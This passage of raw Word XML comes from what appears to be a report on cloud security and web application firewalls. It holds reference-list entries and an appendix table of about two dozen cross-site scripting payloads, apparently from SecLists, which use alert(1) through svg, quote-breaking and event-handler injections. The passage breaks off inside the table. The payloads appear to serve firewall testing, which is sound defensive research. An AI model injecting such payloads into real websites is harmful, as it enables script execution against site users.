      <w:r w:rsidRPr="00BB52C4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Mell, P. M., &amp; Grance, T. (2011). The NIST definition of cloud computing. https://doi.org/10.6028/nist.sp.800-145 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61210F52" w14:textId="77777777" w:rsidR="00A62118" w:rsidRPr="00BB52C4" w:rsidRDefault="00A62118" w:rsidP="00A62118">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:ind w:left="567" w:hanging="567"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB52C4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Miessler, D. (2020, May 27). </w:t>
      </w:r>
      <w:r w:rsidRPr="00BB52C4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>SecLists XSS-BruteLogic</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB52C4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. GitHub. https://github.com/danielmiessler/SecLists/blob/master/Fuzzing/XSS/XSS-BruteLogic.txt. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C559B7F" w14:textId="77777777" w:rsidR="00A62118" w:rsidRPr="00BB52C4" w:rsidRDefault="00A62118" w:rsidP="00A62118">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:ind w:left="567" w:hanging="567"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB52C4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Nix, E. (2016, August 4). </w:t>
      </w:r>
      <w:r w:rsidRPr="00BB52C4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>The World's First Web Site</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB52C4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. History.com. https://www.history.com/news/the-worlds-first-web-site. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B3B47C2" w14:textId="77777777" w:rsidR="00A62118" w:rsidRPr="00BB52C4" w:rsidRDefault="00A62118" w:rsidP="00A62118">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:ind w:left="567" w:hanging="567"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB52C4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Pedamkar, P. (2021, March 1). </w:t>
      </w:r>
      <w:r w:rsidRPr="00BB52C4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>History of Cloud Computing: Brief Overview of Cloud Computing</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB52C4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. EDUCBA. https://www.educba.com/history-of-cloud-computing/. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C3C912C" w14:textId="77777777" w:rsidR="00A62118" w:rsidRPr="00BB52C4" w:rsidRDefault="00A62118" w:rsidP="00A62118">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:ind w:left="567" w:hanging="567"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB52C4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Richter, F. (2021, February 4). </w:t>
      </w:r>
      <w:r w:rsidRPr="00BB52C4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Infographic: Amazon Leads $130-Billion Cloud Market</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB52C4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. Statista Infographics. https://www.statista.com/chart/18819/worldwide-market-share-of-leading-cloud-infrastructure-service-providers/. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A9A51ED" w14:textId="77777777" w:rsidR="00A62118" w:rsidRPr="00BB52C4" w:rsidRDefault="00A62118" w:rsidP="00A62118">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:ind w:left="567" w:hanging="567"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB52C4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Schmidt, E. (2006). </w:t>
      </w:r>
      <w:r w:rsidRPr="00BB52C4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Search Engine Strategies Conference</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB52C4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. Google. https://www.google.com/press/podium/ses2006.html. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D45BE33" w14:textId="77777777" w:rsidR="00A62118" w:rsidRPr="00BB52C4" w:rsidRDefault="00A62118" w:rsidP="00A62118">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:ind w:left="567" w:hanging="567"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB52C4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">SpiderLabs. (2021). </w:t>
      </w:r>
      <w:r w:rsidRPr="00BB52C4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>ModSecurity</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB52C4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. GitHub. https://github.com/SpiderLabs/ModSecurity. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="079E80D9" w14:textId="77777777" w:rsidR="00A62118" w:rsidRPr="00BB52C4" w:rsidRDefault="00A62118" w:rsidP="00A62118">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:ind w:left="567" w:hanging="567"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB52C4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Verizon. (2020). Verizon: Data Breach Investigations Report 2020. </w:t>
      </w:r>
      <w:r w:rsidRPr="00BB52C4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Computer Fraud &amp; Security</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB52C4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00BB52C4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>2020</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB52C4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">(6), 4. https://doi.org/10.1016/s1361-3723(20)30059-2 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66C1C1E6" w14:textId="77777777" w:rsidR="00A62118" w:rsidRPr="00BB52C4" w:rsidRDefault="00A62118" w:rsidP="00A62118">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:ind w:left="567" w:hanging="567"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB52C4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">WafCharm. (2020, May 28). </w:t>
      </w:r>
      <w:r w:rsidRPr="00BB52C4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>WAF protecting 7th layer of OSI model</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB52C4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. https://www.wafcharm.com/en/blog/waf-protecting-7th-layer-of-osi-model/. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D9A83D5" w14:textId="77777777" w:rsidR="00A6745C" w:rsidRDefault="00A6745C" w:rsidP="00BD5AA5">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="06F322ED" w14:textId="388F7FF7" w:rsidR="00EF2B18" w:rsidRDefault="00EF2B18" w:rsidP="00BD5AA5">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="742D0477" w14:textId="77777777" w:rsidR="00EF2B18" w:rsidRPr="00DE6606" w:rsidRDefault="00EF2B18" w:rsidP="00BD5AA5">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="175D4BD5" w14:textId="767A2841" w:rsidR="00861F2A" w:rsidRPr="00DE6606" w:rsidRDefault="00861F2A" w:rsidP="00BD5AA5">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="47672ED0" w14:textId="3DEBC812" w:rsidR="00861F2A" w:rsidRPr="002C3E0B" w:rsidRDefault="00861F2A" w:rsidP="009010C8">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00DE6606">
        <w:br w:type="page"/>
      </w:r>
      <w:bookmarkStart w:id="83" w:name="_Toc71138518"/>
      <w:r w:rsidR="009010C8">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">8. </w:t>
      </w:r>
      <w:r w:rsidR="002C3E0B" w:rsidRPr="002C3E0B">
        <w:t>Appendix</w:t>
      </w:r>
      <w:bookmarkEnd w:id="83"/>
    </w:p>
    <w:p w14:paraId="11BD2F04" w14:textId="4BBF9AB4" w:rsidR="002C3E0B" w:rsidRDefault="00564269" w:rsidP="00564269">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>XSS payloads</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9016"/>
      </w:tblGrid>
      <w:tr w:rsidR="00564269" w14:paraId="3D9EE243" w14:textId="77777777" w:rsidTr="00564269">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9016" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="36C39816" w14:textId="77777777" w:rsidR="00564269" w:rsidRPr="00564269" w:rsidRDefault="00564269" w:rsidP="00564269">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00564269">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>&lt;svg onload=alert(1)&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="08AE44A9" w14:textId="77777777" w:rsidR="00564269" w:rsidRPr="00564269" w:rsidRDefault="00564269" w:rsidP="00564269">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00564269">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>"&gt;&lt;svg onload=alert(1)//</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="208CB182" w14:textId="77777777" w:rsidR="00564269" w:rsidRPr="00564269" w:rsidRDefault="00564269" w:rsidP="00564269">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00564269">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>"onmouseover=alert(1)//</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="50827ED9" w14:textId="77777777" w:rsidR="00564269" w:rsidRPr="00564269" w:rsidRDefault="00564269" w:rsidP="00564269">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00564269">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>"autofocus/onfocus=alert(1)//</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="394934A2" w14:textId="77777777" w:rsidR="00564269" w:rsidRPr="00564269" w:rsidRDefault="00564269" w:rsidP="00564269">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00564269">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>'-alert(1)-'</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4874F09C" w14:textId="77777777" w:rsidR="00564269" w:rsidRPr="00564269" w:rsidRDefault="00564269" w:rsidP="00564269">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00564269">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>'-alert(1)//</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="493F6EA2" w14:textId="77777777" w:rsidR="00564269" w:rsidRPr="00564269" w:rsidRDefault="00564269" w:rsidP="00564269">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00564269">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>\'-alert(1)//</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="21840E27" w14:textId="77777777" w:rsidR="00564269" w:rsidRPr="00564269" w:rsidRDefault="00564269" w:rsidP="00564269">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00564269">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>&lt;/script&gt;&lt;svg onload=alert(1)&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="621FA4B7" w14:textId="77777777" w:rsidR="00564269" w:rsidRPr="00564269" w:rsidRDefault="00564269" w:rsidP="00564269">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00564269">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>&lt;x contenteditable onblur=alert(1)&gt;lose focus!</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="72FEE34F" w14:textId="77777777" w:rsidR="00564269" w:rsidRPr="00564269" w:rsidRDefault="00564269" w:rsidP="00564269">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00564269">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>&lt;x onclick=alert(1)&gt;click this!</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="37633DF1" w14:textId="77777777" w:rsidR="00564269" w:rsidRPr="00564269" w:rsidRDefault="00564269" w:rsidP="00564269">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00564269">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>&lt;x oncopy=alert(1)&gt;copy this!</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="754C2448" w14:textId="77777777" w:rsidR="00564269" w:rsidRPr="00564269" w:rsidRDefault="00564269" w:rsidP="00564269">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00564269">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>&lt;x oncontextmenu=alert(1)&gt;right click this!</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0518E747" w14:textId="77777777" w:rsidR="00564269" w:rsidRPr="00564269" w:rsidRDefault="00564269" w:rsidP="00564269">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00564269">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>&lt;x oncut=alert(1)&gt;copy this!</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="276D51DB" w14:textId="77777777" w:rsidR="00564269" w:rsidRPr="00564269" w:rsidRDefault="00564269" w:rsidP="00564269">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00564269">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>&lt;x ondblclick=alert(1)&gt;double click this!</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="27EA07D7" w14:textId="77777777" w:rsidR="00564269" w:rsidRPr="00564269" w:rsidRDefault="00564269" w:rsidP="00564269">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00564269">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>&lt;x ondrag=alert(1)&gt;drag this!</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="583B8F4E" w14:textId="77777777" w:rsidR="00564269" w:rsidRPr="00564269" w:rsidRDefault="00564269" w:rsidP="00564269">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00564269">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>&lt;x contenteditable onfocus=alert(1)&gt;focus this!</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7FF5991F" w14:textId="77777777" w:rsidR="00564269" w:rsidRPr="00564269" w:rsidRDefault="00564269" w:rsidP="00564269">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00564269">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>&lt;x contenteditable oninput=alert(1)&gt;input here!</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0C0028C9" w14:textId="77777777" w:rsidR="00564269" w:rsidRPr="00564269" w:rsidRDefault="00564269" w:rsidP="00564269">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00564269">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>&lt;x contenteditable onkeydown=alert(1)&gt;press any key!</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7D29577F" w14:textId="77777777" w:rsidR="00564269" w:rsidRPr="00564269" w:rsidRDefault="00564269" w:rsidP="00564269">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00564269">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>&lt;x contenteditable onkeypress=alert(1)&gt;press any key!</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="360E90FC" w14:textId="77777777" w:rsidR="00564269" w:rsidRPr="00564269" w:rsidRDefault="00564269" w:rsidP="00564269">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00564269">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>&lt;x contenteditable onkeyup=alert(1)&gt;press any key!</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="67DCD21C" w14:textId="77777777" w:rsidR="00564269" w:rsidRPr="00564269" w:rsidRDefault="00564269" w:rsidP="00564269">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00564269">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>&lt;x onmousedown=alert(1)&gt;click this!</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1D756FB7" w14:textId="77777777" w:rsidR="00564269" w:rsidRPr="00564269" w:rsidRDefault="00564269" w:rsidP="00564269">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00564269">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t>&lt;x onmousemove=alert(1)&gt;hover this!</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3D4B7667" w14:textId="77777777" w:rsidR="00564269" w:rsidRPr="00564269" w:rsidRDefault="00564269" w:rsidP="00564269">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00564269">
              <w:rPr>
